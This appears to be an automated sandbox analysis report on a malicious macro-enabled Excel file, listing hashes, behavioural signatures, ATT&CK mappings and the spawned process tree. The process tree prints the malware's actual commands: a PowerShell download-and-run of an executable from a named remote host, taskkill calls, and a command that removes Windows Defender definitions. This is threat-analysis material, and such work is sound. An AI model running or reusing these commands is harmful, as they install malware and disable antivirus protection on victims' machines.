Overview

overview

10

Static

static

8

800d6760b2...9.xlsm

windows7-x64

10

800d6760b2...9.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    74s
  • max time network
    74s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    30-11-2022 16:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    800d6760b293cd2e33128cff0e08e1000a53ab91c3ba05e6e1577a9490899b59.xlsm

  • Size

    28KB

  • MD5

    687ddd53b6c273583e08db1698bfeabc

  • SHA1

    ed237ecf129e28f509de74a6f3c560a3d2aa2bec

  • SHA256

    800d6760b293cd2e33128cff0e08e1000a53ab91c3ba05e6e1577a9490899b59

  • SHA512

    3462614f8f8c9260be3bd585c9c307c1b6abe184950338b65e52a52a56184b4813351f7df035261f276473cb351a8d82d6d673cb8e5ea21aae5509c16222c0ef

  • SSDEEP

    768:+dgb8qEv5j/hv2454yNX0R/V+BKlRGstxHIU:+B15j/s45rNER/V+B6Rn7HIU

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://lokipanelhostingpanel.gq/work/worknew/1.exe

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\800d6760b293cd2e33128cff0e08e1000a53ab91c3ba05e6e1577a9490899b59.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2036
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://lokipanelhostingpanel.gq/work/worknew/1.exe','C:\Users\Public\svchost32.exe');Start-Process 'C:\Users\Public\svchost32.exe'
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1884
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im winword.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1672
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden taskkill /f /im Excel.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1812
      • C:\Windows\SysWOW64\taskkill.exe
        "C:\Windows\system32\taskkill.exe" /f /im Excel.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1804
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files (x86)\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & exit
      2⤵
      • Process spawned unexpected child process
      PID:628

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    7cfd9dd1539cfc32bb2bd70a49107f92

    SHA1

    cb710c90ac14e7d9ff7c6b71e3ef320937de4b38

    SHA256

    b7b315767433b6f99849bb58e75fab2f3407f5be44b100591133cad1c3e2311d

    SHA512

    b8e9aad387ace36ff7a87d247509b0c672be240dff8d404326863726e171f80b7e9cc744e493ac5baf25e714ece23218b398b49a17c9f0dc1c24cd655351d445

    Download Submit
  • memory/628-65-0x0000000000000000-mapping.dmp
    Download
  • memory/1672-67-0x0000000000000000-mapping.dmp
    Download
  • memory/1804-74-0x0000000000000000-mapping.dmp
    Download
  • memory/1812-71-0x000000006BDC0000-0x000000006C36B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/1812-76-0x000000006BDC0000-0x000000006C36B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/1812-73-0x000000006BDC0000-0x000000006C36B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/1812-64-0x0000000000000000-mapping.dmp
    Download
  • memory/1884-70-0x000000006BDC0000-0x000000006C36B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/1884-77-0x000000006BDC0000-0x000000006C36B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/1884-62-0x0000000000000000-mapping.dmp
    Download
  • memory/1884-72-0x000000006BDC0000-0x000000006C36B000-memory.dmp
    Filesize

    5.7MB

    Download
  • memory/1948-63-0x0000000000000000-mapping.dmp
    Download
  • memory/2036-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2036-57-0x0000000075511000-0x0000000075513000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2036-54-0x000000002F111000-0x000000002F114000-memory.dmp
    Filesize

    12KB

    Download
  • memory/2036-58-0x00000000727BD000-0x00000000727C8000-memory.dmp
    Filesize

    44KB

    Download
  • memory/2036-59-0x00000000727BD000-0x00000000727C8000-memory.dmp
    Filesize

    44KB

    Download
  • memory/2036-55-0x00000000717D1000-0x00000000717D3000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2036-75-0x00000000727BD000-0x00000000727C8000-memory.dmp
    Filesize

    44KB

    Download
  • memory/2036-61-0x000000006CA71000-0x000000006CA73000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2036-60-0x000000006CBE1000-0x000000006CBE3000-memory.dmp
    Filesize

    8KB

    Download